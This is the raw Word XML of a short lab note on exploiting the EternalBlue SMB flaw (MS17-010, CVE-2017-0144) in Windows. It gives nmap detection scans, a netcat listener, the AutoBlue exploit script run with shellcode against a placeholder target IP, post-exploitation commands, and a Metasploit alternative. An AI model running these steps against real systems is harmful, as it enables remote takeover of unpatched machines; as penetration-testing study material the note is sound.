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CF869" w14:textId="5DF7A00F" w:rsidR="00A96049" w:rsidRPr="00A96049" w:rsidRDefault="00B74836" w:rsidP="00A96049">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Windows MS17-010</w:t>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://nvd.nist.gov/vuln/detail/cve-2017-0144"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CVE-2017-</w:t>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>0144)</w:t>
      </w:r>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB Vulnerability (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96049" w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC043A4" w14:textId="4B24DA8D" w:rsidR="00B74836" w:rsidRDefault="00A96049">
      <w:r w:rsidRPr="00A96049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003A0B69">
        <w:t>Remotely execute the arbitrary command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1EEEB" w14:textId="3689D408" w:rsidR="003A0B69" w:rsidRDefault="003A0B69">
      <w:r>
        <w:t xml:space="preserve">It not only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access but also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the escalated privileged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435471BE" w14:textId="77777777" w:rsidR="003A0B69" w:rsidRDefault="003A0B69"/>
    <w:p w14:paraId="1E335D2D" w14:textId="3F5952E6" w:rsidR="003A0B69" w:rsidRPr="004660EE" w:rsidRDefault="003A0B69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004660EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036E9C1" w14:textId="744B5966" w:rsidR="003A0B69" w:rsidRDefault="003A0B69">
      <w:r>
        <w:t>Autoblue-MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE31DCA" w14:textId="47BD5CAD" w:rsidR="003A0B69" w:rsidRDefault="004660EE">
      <w:r>
        <w:t xml:space="preserve">That is collection of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCD778A" w14:textId="77777777" w:rsidR="004660EE" w:rsidRDefault="004660EE"/>
    <w:p w14:paraId="6367C2F6" w14:textId="1E31BE82" w:rsidR="00A23B80" w:rsidRPr="00A23B80" w:rsidRDefault="00A23B80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5657D" w14:textId="7FF2AB00" w:rsidR="00A23B80" w:rsidRDefault="00A23B80">
      <w:r>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s V -p 445 -O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DEE5294" w14:textId="25C8EEC6" w:rsidR="00A23B80" w:rsidRDefault="00241C74">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Nmap  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>s V -p 445 –script smb-vuln-ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A13716F" w14:textId="77777777" w:rsidR="00241C74" w:rsidRDefault="00241C74"/>
    <w:p w14:paraId="371E6ABA" w14:textId="5CA7ED0A" w:rsidR="00241C74" w:rsidRPr="00241C74" w:rsidRDefault="00241C74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00241C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20657AB7" w14:textId="1F179F3B" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t xml:space="preserve">Clone the repo of the autoblue-ms17-010 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0C4F3" w14:textId="122E4B6B" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t xml:space="preserve">And then go to the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC5E70B" w14:textId="060213CC" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F42C6" w14:textId="702666F3" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FAED59" w14:textId="49C5B31F" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x shell_prep.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776727F6" w14:textId="2B1188A9" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t>./shell_prep.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D17E61" w14:textId="2AEBC424" w:rsidR="00241C74" w:rsidRDefault="00241C74">
      <w:r>
        <w:t>Provide the values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10091686" w14:textId="68477B25" w:rsidR="007B43A4" w:rsidRDefault="007B43A4">
      <w:r>
        <w:t>Sc_x64.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4E627" w14:textId="5B0EF0A7" w:rsidR="007B43A4" w:rsidRDefault="00E04A54">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Base</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on architecture of target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4E9B0" w14:textId="77777777" w:rsidR="00E00FD9" w:rsidRPr="00E04A54" w:rsidRDefault="00E00FD9" w:rsidP="00E00FD9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Make a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E04A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E04A54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E60298" w14:textId="77777777" w:rsidR="00E00FD9" w:rsidRDefault="00E00FD9" w:rsidP="00E00FD9">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059F3A6" w14:textId="77777777" w:rsidR="00E00FD9" w:rsidRDefault="00E00FD9"/>
    <w:p w14:paraId="2D7D37DB" w14:textId="73F027C2" w:rsidR="00E04A54" w:rsidRDefault="00E04A54">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  +</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>x eternalblue_exploit7.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2208557B" w14:textId="02469108" w:rsidR="00E04A54" w:rsidRDefault="00E04A54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:t>eternalblue_exploit7.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  shellcode/sc_x64.bin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DB162EA" w14:textId="7EFCC464" w:rsidR="008A6C8B" w:rsidRDefault="00E00FD9">
      <w:r>
        <w:t xml:space="preserve">And then </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we  get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28004D30" w14:textId="77777777" w:rsidR="00E00FD9" w:rsidRDefault="00E00FD9"/>
    <w:p w14:paraId="152C9E29" w14:textId="6FC05212" w:rsidR="00F95BE6" w:rsidRPr="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95BE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At listener terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9008D5" w14:textId="0379757B" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E036D9C" w14:textId="4E86E051" w:rsidR="00F95BE6" w:rsidRDefault="00C27468">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="064B7866" w14:textId="676C5C1F" w:rsidR="00C27468" w:rsidRDefault="00C27468">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3622CF29" w14:textId="77777777" w:rsidR="00C27468" w:rsidRDefault="00C27468"/>
    <w:p w14:paraId="6E686B96" w14:textId="2AD8224E" w:rsidR="00F95BE6" w:rsidRPr="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95BE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96E066" w14:textId="66A7E62F" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072AF32" w14:textId="1A4720F0" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EA56602" w14:textId="301EAA8C" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t>#auxiliary is used to check that target is vuln or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAE8A6" w14:textId="4678361E" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t>Use (num/exploit(name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFDA63" w14:textId="6B954C84" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37177A44" w14:textId="763EF898" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D07FE" w14:textId="226848CA" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41615FA5" w14:textId="77777777" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6"/>
    <w:p w14:paraId="5892DB91" w14:textId="77777777" w:rsidR="00C27468" w:rsidRDefault="00C27468"/>
    <w:p w14:paraId="773D52BF" w14:textId="77777777" w:rsidR="00C27468" w:rsidRDefault="00C27468"/>
    <w:p w14:paraId="202CEAF8" w14:textId="77777777" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6"/>
    <w:p w14:paraId="222F27CF" w14:textId="77777777" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6"/>
    <w:p w14:paraId="5798DC7F" w14:textId="77777777" w:rsidR="00F95BE6" w:rsidRDefault="00F95BE6"/>
    <w:p w14:paraId="3079C9EF" w14:textId="77777777" w:rsidR="00E04A54" w:rsidRDefault="00E04A54"/>
    <w:p w14:paraId="2479772F" w14:textId="77777777" w:rsidR="00241C74" w:rsidRDefault="00241C74"/>
    <w:sectPr w:rsidR="00241C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CD2"/>
    <w:rsid w:val="00241C74"/>
    <w:rsid w:val="003A0B69"/>
    <w:rsid w:val="004660EE"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006F7630"/>
    <w:rsid w:val="007B43A4"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008A6C8B"/>
    <w:rsid w:val="00A23B80"/>
    <w:rsid w:val="00A96049"/>
    <w:rsid w:val="00B74836"/>
    <w:rsid w:val="00C27468"/>
    <w:rsid w:val="00D36CD2"/>
    <w:rsid w:val="00E00FD9"/>
    <w:rsid w:val="00E04A54"/>
    <w:rsid w:val="00F9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B106E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1C436A0-846F-42C5-AD55-89EDBC46B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6C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C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C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C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6C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C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C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C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C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C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CD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60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60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24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-27T05:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T06:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>